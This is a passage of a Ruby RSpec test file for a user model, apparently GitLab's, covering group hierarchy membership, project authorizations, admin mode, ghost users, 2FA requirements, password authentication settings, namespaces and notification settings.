nested_group_2, nested_group_2_1
]
end
end
context 'user is member of the first child (internal node), branch 1' do
before do
nested_group_1.add_owner(user)
end
it 'returns the groups in the hierarchy' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1
]
end
end
context 'user is member of the first child (internal node), branch 2' do
before do
nested_group_2.add_owner(user)
end
it 'returns the groups in the hierarchy' do
is_expected.to match_array [
group,
nested_group_2, nested_group_2_1
]
end
end
context 'user is member of the last child (leaf node)' do
before do
nested_group_1_1.add_owner(user)
end
it 'returns the groups in the hierarchy' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1
]
end
end
end
describe '#refresh_authorized_projects', :clean_gitlab_redis_shared_state do
let(:project1) { create(:project) }
let(:project2) { create(:project) }
let(:user) { create(:user) }
before do
project1.add_reporter(user)
project2.add_guest(user)
user.project_authorizations.delete_all
user.refresh_authorized_projects
end
it 'refreshes the list of authorized projects' do
expect(user.project_authorizations.count).to eq(2)
end
it 'stores the correct access levels' do
expect(user.project_authorizations.where(access_level: Gitlab::Access::GUEST).exists?).to eq(true)
expect(user.project_authorizations.where(access_level: Gitlab::Access::REPORTER).exists?).to eq(true)
end
end
describe '#access_level=' do
let(:user) { build(:user) }
it 'does nothing for an invalid access level' do
user.access_level = :invalid_access_level
expect(user.access_level).to eq(:regular)
expect(user.admin).to be false
end
it "assigns the 'admin' access level" do
user.access_level = :admin
expect(user.access_level).to eq(:admin)
expect(user.admin).to be true
end
it "doesn't clear existing access levels when an invalid access level is passed in" do
user.access_level = :admin
user.access_level = :invalid_access_level
expect(user.access_level).to eq(:admin)
expect(user.admin).to be true
end
it "accepts string values in addition to symbols" do
user.access_level = 'admin'
expect(user.access_level).to eq(:admin)
expect(user.admin).to be true
end
end
describe '#can_read_all_resources?', :request_store do
it 'returns false for regular user' do
user = build_stubbed(:user)
expect(user.can_read_all_resources?).to be_falsy
end
context 'for admin user' do
include_context 'custom session'
let(:user) { build_stubbed(:user, :admin) }
context 'when admin mode is disabled' do
it 'returns false' do
expect(user.can_read_all_resources?).to be_falsy
end
end
context 'when admin mode is enabled' do
before do
Gitlab::Auth::CurrentUserMode.new(user).request_admin_mode!
Gitlab::Auth::CurrentUserMode.new(user).enable_admin_mode!(password: user.password)
end
it 'returns true' do
expect(user.can_read_all_resources?).to be_truthy
end
end
end
end
describe '.ghost' do
it "creates a ghost user if one isn't already present" do
ghost = described_class.ghost
expect(ghost).to be_ghost
expect(ghost).to be_persisted
expect(ghost.namespace).not_to be_nil
expect(ghost.namespace).to be_persisted
expect(ghost.user_type).to eq 'ghost'
end
it "does not create a second ghost user if one is already present" do
expect do
described_class.ghost
described_class.ghost
end.to change { described_class.count }.by(1)
expect(described_class.ghost).to eq(described_class.ghost)
end
context "when a regular user exists with the username 'ghost'" do
it "creates a ghost user with a non-conflicting username" do
create(:user, username: 'ghost')
ghost = described_class.ghost
expect(ghost).to be_persisted
expect(ghost.username).to eq('ghost1')
end
end
context "when a regular user exists with the email '[email protected]'" do
it "creates a ghost user with a non-conflicting email" do
create(:user, email: '[email protected]')
ghost = described_class.ghost
expect(ghost).to be_persisted
expect(ghost.email).to eq('[email protected]')
end
end
context 'when a domain whitelist is in place' do
before do
stub_application_setting(domain_whitelist: ['gitlab.com'])
end
it 'creates a ghost user' do
expect(described_class.ghost).to be_persisted
end
end
end
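# The 2FA requirement is recalculated from all of the user's groups, including ancestors of the
# groups they belong to; when several groups require 2FA, the shortest grace period wins.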
describe '#update_two_factor_requirement' do
let(:user) { create :user }
context 'with 2FA requirement on groups' do
let(:group1) { create :group, require_two_factor_authentication: true, two_factor_grace_period: 23 }
let(:group2) { create :group, require_two_factor_authentication: true, two_factor_grace_period: 32 }
before do
group1.add_user(user, GroupMember::OWNER)
group2.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'requires 2FA' do
expect(user.require_two_factor_authentication_from_group).to be true
end
it 'uses the shortest grace period' do
expect(user.two_factor_grace_period).to be 23
end
end
context 'with 2FA requirement from expanded groups' do
let!(:group1) { create :group, require_two_factor_authentication: true }
let!(:group1a) { create :group, parent: group1 }
before do
group1a.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'requires 2FA' do
expect(user.require_two_factor_authentication_from_group).to be true
end
end
context 'with 2FA requirement on nested child group' do
let!(:group1) { create :group, require_two_factor_authentication: false }
let!(:group1a) { create :group, require_two_factor_authentication: true, parent: group1 }
before do
group1.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'requires 2FA' do
expect(user.require_two_factor_authentication_from_group).to be true
end
end
context "with 2FA requirement from shared project's group" do
let!(:group1) { create :group, require_two_factor_authentication: true }
let!(:group2) { create :group }
let(:shared_project) { create(:project, namespace: group1) }
before do
shared_project.project_group_links.create!(
group: group2,
group_access: ProjectGroupLink.default_access
)
group2.add_user(user, GroupMember::OWNER)
end
it 'does not require 2FA' do
user.update_two_factor_requirement
expect(user.require_two_factor_authentication_from_group).to be false
end
end
context 'without 2FA requirement on groups' do
let(:group) { create :group }
before do
group.add_user(user, GroupMember::OWNER)
user.update_two_factor_requirement
end
it 'does not require 2FA' do
expect(user.require_two_factor_authentication_from_group).to be false
end
it 'falls back to the default grace period' do
expect(user.two_factor_grace_period).to be 48
end
end
end
describe '.active' do
before do
described_class.ghost
create(:user, name: 'user', state: 'active')
create(:user, name: 'user', state: 'blocked')
end
it 'only counts active and non-internal users' do
expect(described_class.active.count).to eq(1)
end
end
describe 'preferred language' do
it 'is English by default' do
user = create(:user)
expect(user.preferred_language).to eq('en')
end
end
describe '#invalidate_issue_cache_counts' do
let(:user) { build_stubbed(:user) }
it 'invalidates cache for issue counter' do
cache_mock = double
expect(cache_mock).to receive(:delete).with(['users', user.id, 'assigned_open_issues_count'])
allow(Rails).to receive(:cache).and_return(cache_mock)
user.invalidate_issue_cache_counts
end
end
describe '#invalidate_merge_request_cache_counts' do
let(:user) { build_stubbed(:user) }
it 'invalidates cache for Merge Request counter' do
cache_mock = double
expect(cache_mock).to receive(:delete).with(['users', user.id, 'assigned_open_merge_requests_count'])
allow(Rails).to receive(:cache).and_return(cache_mock)
user.invalidate_merge_request_cache_counts
end
end
describe '#invalidate_personal_projects_count' do
let(:user) { build_stubbed(:user) }
it 'invalidates cache for personal projects counter' do
cache_mock = double
expect(cache_mock).to receive(:delete).with(['users', user.id, 'personal_projects_count'])
allow(Rails).to receive(:cache).and_return(cache_mock)
user.invalidate_personal_projects_count
end
end
describe '#allow_password_authentication_for_web?' do
context 'regular user' do
let(:user) { build(:user) }
it 'returns true when password authentication is enabled for the web interface' do
expect(user.allow_password_authentication_for_web?).to be_truthy
end
it 'returns false when password authentication is disabled for the web interface' do
stub_application_setting(password_authentication_enabled_for_web: false)
expect(user.allow_password_authentication_for_web?).to be_falsey
end
end
it 'returns false for ldap user' do
user = create(:omniauth_user, provider: 'ldapmain')
expect(user.allow_password_authentication_for_web?).to be_falsey
end
it 'returns false for ultraauth user' do
user = create(:omniauth_user, provider: 'ultraauth')
expect(user.allow_password_authentication_for_web?).to be_falsey
end
end
describe '#allow_password_authentication_for_git?' do
context 'regular user' do
let(:user) { build(:user) }
it 'returns true when password authentication is enabled for Git' do
expect(user.allow_password_authentication_for_git?).to be_truthy
end
it 'returns false when password authentication is disabled for Git' do
stub_application_setting(password_authentication_enabled_for_git: false)
expect(user.allow_password_authentication_for_git?).to be_falsey
end
end
it 'returns false for ldap user' do
user = create(:omniauth_user, provider: 'ldapmain')
expect(user.allow_password_authentication_for_git?).to be_falsey
end
it 'returns false for ultraauth user' do
user = create(:omniauth_user, provider: 'ultraauth')
expect(user.allow_password_authentication_for_git?).to be_falsey
end
end
describe '#assigned_open_merge_requests_count' do
it 'returns number of open merge requests from non-archived projects' do
user = create(:user)
project = create(:project, :public)
archived_project = create(:project, :public, :archived)
create(:merge_request, source_project: project, author: user, assignees: [user])
create(:merge_request, :closed, source_project: project, author: user, assignees: [user])
create(:merge_request, source_project: archived_project, author: user, assignees: [user])
expect(user.assigned_open_merge_requests_count(force: true)).to eq 1
end
end
describe '#assigned_open_issues_count' do
it 'returns number of open issues from non-archived projects' do
user = create(:user)
project = create(:project, :public)
archived_project = create(:project, :public, :archived)
create(:issue, project: project, author: user, assignees: [user])
create(:issue, :closed, project: project, author: user, assignees: [user])
create(:issue, project: archived_project, author: user, assignees: [user])
expect(user.assigned_open_issues_count(force: true)).to eq 1
end
end
describe '#personal_projects_count' do
it 'returns the number of personal projects using a single query' do
user = build(:user)
projects = double(:projects, count: 1)
expect(user).to receive(:personal_projects).and_return(projects)
expect(user.personal_projects_count).to eq(1)
end
end
describe '#projects_limit_left' do
it 'returns the number of projects that can be created by the user' do
user = build(:user)
allow(user).to receive(:projects_limit).and_return(10)
allow(user).to receive(:personal_projects_count).and_return(5)
expect(user.projects_limit_left).to eq(5)
end
end
describe '#ensure_namespace_correct' do
context 'for a new user' do
let(:user) { build(:user) }
it 'creates the namespace' do
expect(user.namespace).to be_nil
user.save!
expect(user.namespace).not_to be_nil
end
end
context 'for an existing user' do
let(:username) { 'foo' }
let(:user) { create(:user, username: username) }
context 'when the user is updated' do
context 'when the username or name is changed' do
let(:new_username) { 'bar' }
it 'changes the namespace (just to compare to when username is not changed)' do
expect do
Timecop.freeze(1.second.from_now) do
user.update!(username: new_username)
end
end.to change { user.namespace.updated_at }
end
it 'updates the namespace path when the username was changed' do
user.update!(username: new_username)
expect(user.namespace.path).to eq(new_username)
end
it 'updates the namespace name if the name was changed' do
user.update!(name: 'New name')
expect(user.namespace.name).to eq('New name')
end
it 'updates nested routes for the namespace if the name was changed' do
project = create(:project, namespace: user.namespace)
user.update!(name: 'New name')
expect(project.route.reload.name).to include('New name')
end
context 'when there is a validation error (namespace name taken) while updating namespace' do
let!(:conflicting_namespace) { create(:group, path: new_username) }
it 'causes the user save to fail' do
expect(user.update(username: new_username)).to be_falsey
expect(user.namespace.errors.messages[:path].first).to eq(_('has already been taken'))
end
it 'adds the namespace errors to the user' do
user.update(username: new_username)
expect(user.errors.full_messages.first).to eq('Username has already been taken')
end
end
end
context 'when the username is not changed' do
it 'does not change the namespace' do
expect do
user.update!(email: 'new-email@example.com')
end.not_to change { user.namespace.updated_at }
end
end
end
end
end
describe '#username_changed_hook' do
context 'for a new user' do
let(:user) { build(:user) }
it 'does not trigger system hook' do
expect(user).not_to receive(:system_hook_service)
user.save!
end
end
context 'for an existing user' do
let(:user) { create(:user, username: 'old-username') }
context 'when the username is changed' do
let(:new_username) { 'very-new-name' }
it 'triggers the rename system hook' do
system_hook_service = SystemHooksService.new
expect(system_hook_service).to receive(:execute_hooks_for).with(user, :rename)
expect(user).to receive(:system_hook_service).and_return(system_hook_service)
user.update!(username: new_username)
end
end
context 'when the username is not changed' do
it 'does not trigger system hook' do
expect(user).not_to receive(:system_hook_service)
user.update!(email: 'new-email@example.com')
end
end
end
end
describe '#will_save_change_to_login?' do
let(:user) { create(:user, username: 'old-username', email: 'old-email@example.com') }
let(:new_username) { 'new-name' }
let(:new_email) { 'new-email@example.com' }
subject { user.will_save_change_to_login? }
context 'when the username is changed' do
before do
user.username = new_username
end
it { is_expected.to be true }
end
context 'when the email is changed' do
before do
user.email = new_email
end
it { is_expected.to be true }
end
context 'when both email and username are changed' do
before do
user.username = new_username
user.email = new_email
end
it { is_expected.to be true }
end
context 'when email and username aren\'t changed' do
before do
user.name = 'new_name'
end
it { is_expected.to be_falsy }
end
end
describe '#sync_attribute?' do
let(:user) { described_class.new }
context 'oauth user' do
it 'returns true if name can be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(name location))
expect(user.sync_attribute?(:name)).to be_truthy
end
it 'returns true if email can be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(name email))
expect(user.sync_attribute?(:email)).to be_truthy
end
it 'returns true if location can be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(location email))
expect(user.sync_attribute?(:email)).to be_truthy
end
it 'returns false if name can not be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(location email))
expect(user.sync_attribute?(:name)).to be_falsey
end
it 'returns false if email can not be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(location name))
expect(user.sync_attribute?(:email)).to be_falsey
end
it 'returns false if location can not be synced' do
stub_omniauth_setting(sync_profile_attributes: %w(name email))
expect(user.sync_attribute?(:location)).to be_falsey
end
it 'returns true for all syncable attributes if all syncable attributes can be synced' do
stub_omniauth_setting(sync_profile_attributes: true)
expect(user.sync_attribute?(:name)).to be_truthy
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_truthy
end
it 'returns false for all syncable attributes but email if no syncable attributes are declared' do
expect(user.sync_attribute?(:name)).to be_falsey
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_falsey
end
end
context 'ldap user' do
it 'returns true for email if ldap user' do
allow(user).to receive(:ldap_user?).and_return(true)
expect(user.sync_attribute?(:name)).to be_falsey
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_falsey
end
it 'returns true for email and location if ldap user and location declared as syncable' do
allow(user).to receive(:ldap_user?).and_return(true)
stub_omniauth_setting(sync_profile_attributes: %w(location))
expect(user.sync_attribute?(:name)).to be_falsey
expect(user.sync_attribute?(:email)).to be_truthy
expect(user.sync_attribute?(:location)).to be_truthy
end
end
end
describe '#confirm_deletion_with_password?' do
where(
password_automatically_set: [true, false],
ldap_user: [true, false],
password_authentication_disabled: [true, false]
)
with_them do
let!(:user) { create(:user, password_automatically_set: password_automatically_set) }
let!(:identity) { create(:identity, user: user) if ldap_user }
# Only confirm deletion with password if all inputs are false
let(:expected) { !(password_automatically_set || ldap_user || password_authentication_disabled) }
before do
stub_application_setting(password_authentication_enabled_for_web: !password_authentication_disabled)
stub_application_setting(password_authentication_enabled_for_git: !password_authentication_disabled)
end
it 'returns false unless all inputs are true' do
expect(user.confirm_deletion_with_password?).to eq(expected)
end
end
end
describe '#delete_async' do
let(:user) { create(:user) }
let(:deleted_by) { create(:user) }
it 'blocks the user then schedules them for deletion if a hard delete is specified' do
expect(DeleteUserWorker).to receive(:perform_async).with(deleted_by.id, user.id, hard_delete: true)
user.delete_async(deleted_by: deleted_by, params: { hard_delete: true })
expect(user).to be_blocked
end
it 'schedules user for deletion without blocking them' do
expect(DeleteUserWorker).to receive(:perform_async).with(deleted_by.id, user.id, {})
user.delete_async(deleted_by: deleted_by)
expect(user).not_to be_blocked
end
end
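# Access levels are memoised per request when RequestStore is enabled, so repeated lookups for
# the same project ids are expected not to issue additional queries.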
describe '#max_member_access_for_project_ids' do
shared_examples 'max member access for projects' do
let(:user) { create(:user) }
let(:group) { create(:group) }
let(:owner_project) { create(:project, group: group) }
let(:maintainer_project) { create(:project) }
let(:reporter_project) { create(:project) }
let(:developer_project) { create(:project) }
let(:guest_project) { create(:project) }
let(:no_access_project) { create(:project) }
let(:projects) do
[owner_project, maintainer_project, reporter_project, developer_project, guest_project, no_access_project].map(&:id)
end
let(:expected) do
{
owner_project.id => Gitlab::Access::OWNER,
maintainer_project.id => Gitlab::Access::MAINTAINER,
reporter_project.id => Gitlab::Access::REPORTER,
developer_project.id => Gitlab::Access::DEVELOPER,
guest_project.id => Gitlab::Access::GUEST,
no_access_project.id => Gitlab::Access::NO_ACCESS
}
end
before do
create(:group_member, user: user, group: group)
maintainer_project.add_maintainer(user)
reporter_project.add_reporter(user)
developer_project.add_developer(user)
guest_project.add_guest(user)
end
it 'returns correct roles for different projects' do
expect(user.max_member_access_for_project_ids(projects)).to eq(expected)
end
end
context 'with RequestStore enabled', :request_store do
include_examples 'max member access for projects'
def access_levels(projects)
user.max_member_access_for_project_ids(projects)
end
it 'does not perform extra queries when asked for projects that have already been found' do
access_levels(projects)
expect { access_levels(projects) }.not_to exceed_query_limit(0)
expect(access_levels(projects)).to eq(expected)
end
it 'only requests the extra projects when uncached projects are passed' do
second_maintainer_project = create(:project)
second_developer_project = create(:project)
second_maintainer_project.add_maintainer(user)
second_developer_project.add_developer(user)
all_projects = projects + [second_maintainer_project.id, second_developer_project.id]
expected_all = expected.merge(second_maintainer_project.id => Gitlab::Access::MAINTAINER,
second_developer_project.id => Gitlab::Access::DEVELOPER)
access_levels(projects)
queries = ActiveRecord::QueryRecorder.new { access_levels(all_projects) }
expect(queries.count).to eq(1)
expect(queries.log_message).to match(/\W(#{second_maintainer_project.id}, #{second_developer_project.id})\W/)
expect(access_levels(all_projects)).to eq(expected_all)
end
end
context 'with RequestStore disabled' do
include_examples 'max member access for projects'
end
end
describe '#max_member_access_for_group_ids' do
shared_examples 'max member access for groups' do
let(:user) { create(:user) }
let(:owner_group) { create(:group) }
let(:maintainer_group) { create(:group) }
let(:reporter_group) { create(:group) }
let(:developer_group) { create(:group) }
let(:guest_group) { create(:group) }
let(:no_access_group) { create(:group) }
let(:groups) do
[owner_group, maintainer_group, reporter_group, developer_group, guest_group, no_access_group].map(&:id)
end
let(:expected) do
{
owner_group.id => Gitlab::Access::OWNER,
maintainer_group.id => Gitlab::Access::MAINTAINER,
reporter_group.id => Gitlab::Access::REPORTER,
developer_group.id => Gitlab::Access::DEVELOPER,
guest_group.id => Gitlab::Access::GUEST,
no_access_group.id => Gitlab::Access::NO_ACCESS
}
end
before do
owner_group.add_owner(user)
maintainer_group.add_maintainer(user)
reporter_group.add_reporter(user)
developer_group.add_developer(user)
guest_group.add_guest(user)
end
it 'returns correct roles for different groups' do
expect(user.max_member_access_for_group_ids(groups)).to eq(expected)
end
end
context 'with RequestStore enabled', :request_store do
include_examples 'max member access for groups'
def access_levels(groups)
user.max_member_access_for_group_ids(groups)
end
it 'does not perform extra queries when asked for groups that have already been found' do
access_levels(groups)
expect { access_levels(groups) }.not_to exceed_query_limit(0)
expect(access_levels(groups)).to eq(expected)
end
it 'only requests the extra groups when uncached groups are passed' do
second_maintainer_group = create(:group)
second_developer_group = create(:group)
second_maintainer_group.add_maintainer(user)
second_developer_group.add_developer(user)
all_groups = groups + [second_maintainer_group.id, second_developer_group.id]
expected_all = expected.merge(second_maintainer_group.id => Gitlab::Access::MAINTAINER,
second_developer_group.id => Gitlab::Access::DEVELOPER)
access_levels(groups)
queries = ActiveRecord::QueryRecorder.new { access_levels(all_groups) }
expect(queries.count).to eq(1)
expect(queries.log_message).to match(/\W(#{second_maintainer_group.id}, #{second_developer_group.id})\W/)
expect(access_levels(all_groups)).to eq(expected_all)
end
end
context 'with RequestStore disabled' do
include_examples 'max member access for groups'
end
end
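# Renaming a user leaves a RedirectRoute behind for the old path; that redirect is removed again
# if a new user later claims the old username.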
context 'changing a username' do
let(:user) { create(:user, username: 'foo') }
it 'creates a redirect route' do
expect { user.update!(username: 'bar') }
.to change { RedirectRoute.where(path: 'foo').count }.by(1)
end
it 'deletes the redirect when a user with the old username was created' do
user.update!(username: 'bar')
expect { create(:user, username: 'foo') }
.to change { RedirectRoute.where(path: 'foo').count }.by(-1)
end
end
describe '#required_terms_not_accepted?' do
let(:user) { build(:user) }
subject { user.required_terms_not_accepted? }
context "when terms are not enforced" do
it { is_expected.to be_falsy }
end
context "when terms are enforced and accepted by the user" do
before do
enforce_terms
accept_terms(user)
end
it { is_expected.to be_falsy }
end
context "when terms are enforced but the user has not accepted" do
before do
enforce_terms
end
it { is_expected.to be_truthy }
end
end
describe '#increment_failed_attempts!' do
subject(:user) { create(:user, failed_attempts: 0) }
it 'logs failed sign-in attempts' do
expect { user.increment_failed_attempts! }.to change(user, :failed_attempts).from(0).to(1)
end
it 'does not log failed sign-in attempts when in a GitLab read-only instance' do
allow(Gitlab::Database).to receive(:read_only?) { true }
expect { user.increment_failed_attempts! }.not_to change(user, :failed_attempts)
end
end
describe '#requires_usage_stats_consent?' do
let(:user) { create(:user, :admin, created_at: 8.days.ago) }
before do
allow(user).to receive(:has_current_license?).and_return false
end
context 'in single-user environment' do
it 'requires user consent after one week' do
create(:user, :ghost)
expect(user.requires_usage_stats_consent?).to be true
end
it 'requires user consent after one week if there is another ghost user' do
expect(user.requires_usage_stats_consent?).to be true
end
it 'does not require consent in the first week' do
user.created_at = 6.days.ago
expect(user.requires_usage_stats_consent?).to be false
end
it 'does not require consent if usage stats were set by this user' do
create(:application_setting, usage_stats_set_by_user_id: user.id)
expect(user.requires_usage_stats_consent?).to be false
end
end
context 'in multi-user environment' do
before do
create(:user)
end
it 'does not require consent' do
expect(user.requires_usage_stats_consent?).to be false
end
end
end
context 'with uploads' do
it_behaves_like 'model with uploads', false do
let(:model_object) { create(:user, :with_avatar) }
let(:upload_attribute) { :avatar }
let(:uploader_class) { AttachmentUploader }
end
end
describe '.union_with_user' do
context 'when no user ID is provided' do
it 'returns the input relation' do
user = create(:user)
expect(described_class.union_with_user).to eq([user])
end
end
context 'when a user ID is provided' do
it 'includes the user object in the returned relation' do
user1 = create(:user)
user2 = create(:user)
users = described_class.where(id: user1.id).union_with_user(user2.id)
expect(users).to include(user1)
expect(users).to include(user2)
end
it 'does not re-apply any WHERE conditions on the outer query' do
relation = described_class.where(id: 1).union_with_user(2)
expect(relation.arel.where_sql).to be_nil
end
end
end
describe '.optionally_search' do
context 'using nil as the argument' do
it 'returns the current relation' do
user = create(:user)
expect(described_class.optionally_search).to eq([user])
end
end
context 'using an empty String as the argument' do
it 'returns the current relation' do
user = create(:user)
expect(described_class.optionally_search('')).to eq([user])
end
end
context 'using a non-empty String' do
it 'returns users matching the search query' do
user1 = create(:user)
create(:user)
expect(described_class.optionally_search(user1.name)).to eq([user1])
end
end
end
describe '.where_not_in' do
context 'without an argument' do
it 'returns the current relation' do
user = create(:user)
expect(described_class.where_not_in).to eq([user])
end
end
context 'using a list of user IDs' do
it 'excludes the users from the returned relation' do
user1 = create(:user)
user2 = create(:user)
expect(described_class.where_not_in([user2.id])).to eq([user1])
end
end
end
describe '.reorder_by_name' do
it 'reorders the input relation' do
user1 = create(:user, name: 'A')
user2 = create(:user, name: 'B')
expect(described_class.reorder_by_name).to eq([user1, user2])
end
end
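# With inherit: true, notification settings fall back to the nearest ancestor group that has an
# explicit level or notification email configured.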
describe '#notification_settings_for' do
let(:user) { create(:user) }
let(:source) { nil }
subject { user.notification_settings_for(source) }
context 'when source is nil' do
it 'returns a blank global notification settings object' do
expect(subject.source).to eq(nil)
expect(subject.notification_email).to eq(nil)
expect(subject.level).to eq('global')
end
end
context 'when source is a Group' do
let(:group) { create(:group) }
subject { user.notification_settings_for(group, inherit: true) }
context 'when group has no existing notification settings' do
context 'when group has no ancestors' do
it 'will be a default Global notification setting' do
expect(subject.notification_email).to eq(nil)
expect(subject.level).to eq('global')
end
end
context 'when group has ancestors' do
context 'when an ancestor has a level other than Global' do
let(:ancestor) { create(:group) }
let(:group) { create(:group, parent: ancestor) }
let(:email) { create(:email, :confirmed, email: '[email protected]', user: user) }
before do
create(:notification_setting, user: user, source: ancestor, level: 'participating', notification_email: email.email)
end
it 'has the same level set' do
expect(subject.level).to eq('participating')
end
it 'has the same email set' do
expect(subject.notification_email).to eq('[email protected]')
end
context 'when inherit is false' do
subject { user.notification_settings_for(group) }
it 'does not inherit settings' do
expect(subject.notification_email).to eq(nil)
expect(subject.level).to eq('global')
end
end
end
context 'when an ancestor has a Global level but has an email set' do
let(:grand_ancestor) { create(:group) }
let(:ancestor) { create(:group, parent: grand_ancestor) }
let(:group) { create(:group, parent: ancestor) }
let(:ancestor_email) { create(:email, :confirmed, email: '[email protected]', user: user) }
let(:grand_email) { create(:email, :confirmed, email: '[email protected]', user: user) }
before do
create(:notification_setting, user: user, source: grand_ancestor, level: 'participating', notification_email: grand_email.email)
create(:notification_setting, user: user, source: ancestor, level: 'global', notification_email: ancestor_email.email)
end
it 'has the same email set' do
expect(subject.level).to eq('global')
expect(subject.notification_email).to eq('[email protected]')
end
end
end
end
end
end
describe '#notification_email_for' do
let(:user) { create(:user) }
let(:group) { create(:group) }
subject { user.notification_email_for(group) }
context 'when group is nil' do
let(:group) { nil }
it 'returns global notification email' do
is_expected.to eq(user.notification_email)
end
end
context 'when group has no notification email set' do
it 'returns global notification email' do
create(:notification_setting, user: user, source: group, notification_email: '')
is_expected.to eq(user.notification_email)
end
end
context 'when group has notification email set' do
it 'returns group notification email' do
group_notification_email = '[email protected]'
create(:email, :confirmed, user: user, email: group_notification_email)
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
is_expected.to eq(group_notification_email)
end
end
end
describe '#password_expired?' do
let(:user) { build(:user, password_expires_at: password_expires_at) }
subject { user.password_expired? }
context 'when password_expires_at is not set' do
let(:password_expires_at) {}
it 'returns false' do
is_expected.to be_falsey
end
end
context 'when password_expires_at is in the past' do
let(:password_expires_at) { 1.minute.ago }
it 'returns true' do
is_expected.to be_truthy
end
end
context 'when password_expires_at is in the future' do
let(:password_expires_at) { 1.minute.from_now }
it 'returns false' do
is_expected.to be_falsey
end
end
end
describe '#read_only_attribute?' do
context 'when synced attributes metadata is present' do
it 'delegates to synced_attributes_metadata' do
subject.build_user_synced_attributes_metadata
expect(subject.build_user_synced_attributes_metadata)
.to receive(:read_only?).with(:email).and_return('return-value')
expect(subject.read_only_attribute?(:email)).to eq('return-value')
end
end
context 'when synced attributes metadata is not present' do
it 'is false for any attribute' do
expect(subject.read_only_attribute?(:email)).to be_falsey
end
end
end
describe '.active_without_ghosts' do
let_it_be(:user1) { create(:user, :external) }
let_it_be(:user2) { create(:user, state: 'blocked') }
let_it_be(:user3) { create(:user, :ghost) }
let_it_be(:user4) { create(:user, user_type: :support_bot) }
let_it_be(:user5) { create(:user, state: 'blocked', user_type: :support_bot) }
    it 'returns all active users including active bots but not ghost users' do
expect(described_class.active_without_ghosts).to match_array([user1, user4])
end
end
describe '#dismissed_callout?' do
subject(:user) { create(:user) }
let(:feature_name) { UserCallout.feature_names.each_key.first }
context 'when no callout dismissal record exists' do
it 'returns false when no ignore_dismissal_earlier_than provided' do
expect(user.dismissed_callout?(feature_name: feature_name)).to eq false
end
it 'returns false when ignore_dismissal_earlier_than provided' do
expect(user.dismissed_callout?(feature_name: feature_name, ignore_dismissal_earlier_than: 3.months.ago)).to eq false
end
end
context 'when dismissed callout exists' do
before do
create(:user_callout, user: user, feature_name: feature_name, dismissed_at: 4.months.ago)
end
it 'returns true when no ignore_dismissal_earlier_than provided' do
expect(user.dismissed_callout?(feature_name: feature_name)).to eq true
end
it 'returns true when ignore_dismissal_earlier_than is earlier than dismissed_at' do
expect(user.dismissed_callout?(feature_name: feature_name, ignore_dismissal_earlier_than: 6.months.ago)).to eq true
end
it 'returns false when ignore_dismissal_earlier_than is later than dismissed_at' do
expect(user.dismissed_callout?(feature_name: feature_name, ignore_dismissal_earlier_than: 3.months.ago)).to eq false
end
end
end
describe '#hook_attrs' do
it 'includes name, username, avatar_url, and email' do
user = create(:user)
user_attributes = {
name: user.name,
username: user.username,
avatar_url: user.avatar_url(only_path: false),
email: user.email
}
expect(user.hook_attrs).to eq(user_attributes)
end
end
describe 'user detail' do
context 'when user is initialized' do
let(:user) { build(:user) }
it { expect(user.user_detail).to be_present }
it { expect(user.user_detail).not_to be_persisted }
end
context 'when user detail exists' do
let(:user) { create(:user, job_title: 'Engineer') }
it { expect(user.user_detail).to be_persisted }
end
end
describe '#current_highest_access_level' do
let_it_be(:user) { create(:user) }
context 'when no memberships exist' do
it 'returns nil' do
expect(user.current_highest_access_level).to be_nil
end
end
context 'when memberships exist' do
it 'returns the highest access level for non requested memberships' do
create(:group_member, :reporter, user_id: user.id)
create(:project_member, :guest, user_id: user.id)
create(:project_member, :maintainer, user_id: user.id, requested_at: Time.current)
expect(user.current_highest_access_level).to eq(Gitlab::Access::REPORTER)
end
end
end
context 'when after_commit :update_highest_role' do
describe 'create user' do
subject { create(:user) }
it 'schedules a job in the future', :aggregate_failures, :clean_gitlab_redis_shared_state do
allow_next_instance_of(Gitlab::ExclusiveLease) do |instance|
allow(instance).to receive(:try_obtain).and_return('uuid')
end
expect(UpdateHighestRoleWorker).to receive(:perform_in).and_call_original
expect { subject }.to change(UpdateHighestRoleWorker.jobs, :size).by(1)
end
end
context 'when user already exists' do
let!(:user) { create(:user) }
let(:user_id) { user.id }
describe 'update user' do
using RSpec::Parameterized::TableSyntax
where(:attributes) do
[
{ state: 'blocked' },
{ user_type: :ghost },
{ user_type: :alert_bot }
]
end
with_them do
context 'when state was changed' do
subject { user.update(attributes) }
include_examples 'update highest role with exclusive lease'
end
end
context 'when state was not changed' do
subject { user.update(email: '[email protected]') }
include_examples 'does not update the highest role'
end
end
describe 'destroy user' do
subject { user.destroy }
include_examples 'does not update the highest role'
end
end
end
describe '#active_for_authentication?' do
subject { user.active_for_authentication? }
let(:user) { create(:user) }
context 'when user is blocked' do
before do
user.block
end
it { is_expected.to be false }
end
context 'when user is a ghost user' do
before do
user.update(user_type: :ghost)
end
it { is_expected.to be false }
end
context 'based on user type' do
using RSpec::Parameterized::TableSyntax
where(:user_type, :expected_result) do
'human' | true
'alert_bot' | false
end
with_them do
before do
user.update(user_type: user_type)
end
it { is_expected.to be expected_result }
end
end
end
describe '#inactive_message' do
subject { user.inactive_message }
let(:user) { create(:user) }
context 'when user is blocked' do
before do
user.block
end
it { is_expected.to eq User::BLOCKED_MESSAGE }
end
context 'when user is an internal user' do
before do
user.update(user_type: :ghost)
end
it { is_expected.to be User::LOGIN_FORBIDDEN }
end
context 'when user is locked' do
before do
user.lock_access!
end
it { is_expected.to be :locked }
end
end
describe '#password_required?' do
let_it_be(:user) { create(:user) }
shared_examples 'does not require password to be present' do
it { expect(user).not_to validate_presence_of(:password) }
it { expect(user).not_to validate_presence_of(:password_confirmation) }
end
context 'when user is an internal user' do
before do
user.update(user_type: 'alert_bot')
end
it_behaves_like 'does not require password to be present'
end
context 'when user is a project bot user' do
